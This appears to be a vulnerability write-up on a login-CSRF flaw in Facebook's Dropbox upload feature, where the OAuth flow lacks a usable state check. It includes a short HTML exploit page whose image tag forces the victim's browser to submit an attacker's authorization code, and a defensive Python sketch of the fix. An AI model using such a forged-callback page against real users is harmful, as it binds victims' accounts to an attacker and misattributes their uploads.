CSRF in Facebook/Dropbox - "Mallory added a file using Dropbox"


Facebook lets a user, from within a group page, authorize Dropbox (via OAuth 2.0) and upload a file directly from their Dropbox.

In this case Dropbox is the client, and Facebook is both the authorization server and the protected resource.

When the upload button is clicked, the browser sends the following request:

https://www.facebook.com/dialog/oauth?display=popup&client_id=210019893730&redirect_uri=https://www.dropbox.com/fb/filepicker?restrict=100000740415566&group_id=840143532794003&scope=publish_actions,user_groups,email&response_type=code  

This link is a textbook OAuth 2.0 authorization request, but it carries no state parameter, so it is vulnerable to CSRF.


credit: From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyrights 2017

An opaque value used by the client to maintain state between the request and callback. The authorization server includes this value when redirecting the user-agent back to the client. The parameter SHOULD be used for preventing cross-site request forgery (CSRF).

However, even if a state parameter were added, the flow would still be vulnerable to CSRF.

As stated at the outset, Dropbox is the client, so the authorization server redirects the user back to dropbox.com. But this request is initiated by Facebook, not by Dropbox, so even after the redirect back to Dropbox, Dropbox has no way to check whether the state belongs to this user.

Exploit

Lure the victim into visiting the following page:

<html>
<!-- loading the image makes the victim's browser hit Dropbox's redirect_uri with the attacker's authorization code -->
<img src="https://www.dropbox.com/fb/filepicker?restrict=100000740415566&group_id=236635446746130&code=AQAJspmJvIyCiTicc4QNr7qVU4EF05AYqBE_K9pl-fbhSuKyxtjHS_UyYU8K0SczXZCTa9WxtG7I8EoxAIcyqhyO0tagiVSa1m2H3Umg8uZR6gixrlmUXKuyoXmYsb14yxPbwonYxvepwP2N93gWxhVwl1me-qeenZIX2oKgqBuFMRHAW5SCaYCvYSYtaMlrDyYGoftTCAYM0QfU_bX94LfkHUl81O1tmrLU2NtnU5Eh_XKvxjiD5j2ftSWfpCoxeb7ccaz_9UPZjsFnKGCtTTPX_2dCqi99aT7B3M4idq6hzY-wUuDmaOL143WolrCGkDUu-np8gyEFx4wfMMdX0a0g#_=_" />
</html>

Then, when the victim uploads a file through Dropbox on the Facebook group page, the file is shown as uploaded by the attacker.

The exploit also depends on one further condition:

  • Dropbox's access token is cached forever.
  • Once the victim has an access token bound to Facebook, Dropbox keeps using that first-bound malicious access token to post to Facebook, even if a new, legitimate authorization code arrives later.
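As an added illustration (not code from the original post, nor Dropbox's or Facebook's), the following Python sketch models the two client-side checks the post turns on: a state value that the client itself issues and binds to the user's session, so that a callback the client never initiated (the <img> lure above, or a request started from a page the client does not control) is rejected; and replacing the bound token on every legitimate authorization instead of keeping the first one forever. Session, start_authorization, handle_callback and exchange_code are hypothetical names; the client_id, redirect_uri and scope values are those from the request quoted above, and the authorization codes are constructed placeholders.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# Values taken from the authorization request quoted in the post.
AUTHORIZE_URL = "https://www.facebook.com/dialog/oauth"
REDIRECT_URI = "https://www.dropbox.com/fb/filepicker"
CLIENT_ID = "210019893730"
SCOPE = "publish_actions,user_groups,email"


@dataclass
class Session:
    """Server-side session of one browser at the client (hypothetical).
    oauth_state is set only while an authorization that this client started
    is in flight; linked_token is the access token currently bound to the user."""
    user: str
    oauth_state: Optional[str] = None
    linked_token: Optional[str] = None


def exchange_code(code: str) -> str:
    """Stand-in for the token-endpoint request (constructed, not a real API)."""
    return f"token_for({code})"


def start_authorization(session: Session) -> str:
    """The client itself, not a third-party page, builds the authorization URL
    and records a fresh unguessable state in the user's own session."""
    session.oauth_state = secrets.token_urlsafe(32)
    params = {
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "response_type": "code",
        "scope": SCOPE,
        "state": session.oauth_state,
    }
    return f"{AUTHORIZE_URL}?{urlencode(params)}"


def handle_callback(session: Session, query: Dict[str, str]) -> str:
    """The redirect_uri endpoint. The code is exchanged only if the state
    echoed back equals the one this session issued; on success the new token
    replaces whatever was bound before, so an attacker-bound or stale token
    is never kept forever."""
    expected = session.oauth_state
    presented = query.get("state")
    if expected is None:
        # Nothing in flight for this session: the request was started
        # elsewhere (an <img> lure, or a page the client does not control).
        return "rejected: no authorization in progress"
    if presented is None or not hmac.compare_digest(expected.encode(), presented.encode()):
        return "rejected: state mismatch"
    session.oauth_state = None  # single use
    session.linked_token = exchange_code(query["code"])
    return "linked"


def demo() -> Dict[str, Optional[str]]:
    """Replays the post's scenarios against the checks above."""
    victim = Session(user="victim")

    # 1. Forged callback as in the post's <img> lure: attacker's code,
    #    no state, and no flow started by this session.
    forged = handle_callback(victim, {"code": "ATTACKER_CODE"})

    # 2. A flow is in flight, but the callback carries a state this
    #    session never issued.
    start_authorization(victim)
    wrong = handle_callback(victim, {"code": "ATTACKER_CODE", "state": "guessed"})

    # 3. The post's second condition: an attacker token is already bound.
    #    A legitimate flow must replace it rather than leave it cached.
    victim.linked_token = "token_for(ATTACKER_CODE)"
    url = start_authorization(victim)
    state = parse_qs(urlsplit(url).query)["state"][0]
    legit = handle_callback(victim, {"code": "VICTIM_CODE", "state": state})

    # 4. Replaying the same callback fails because the state was single use.
    replay = handle_callback(victim, {"code": "VICTIM_CODE", "state": state})

    return {"forged": forged, "wrong_state": wrong, "legit": legit,
            "replay": replay, "token": victim.linked_token}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Running the file prints the outcome of each scenario. Scenario 1 is the post's central point: when the authorization request starts from a Facebook page, Dropbox has no state in the victim's session to compare against, so the only safe response at the redirect_uri is to reject the callback and restart the flow from Dropbox's own side; scenario 3 shows why a legitimately obtained token must overwrite the cached one.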

Ref

Into the symmetry: CSRF in Facebook/Dropbox - "Mallory added a file using Dropbox"
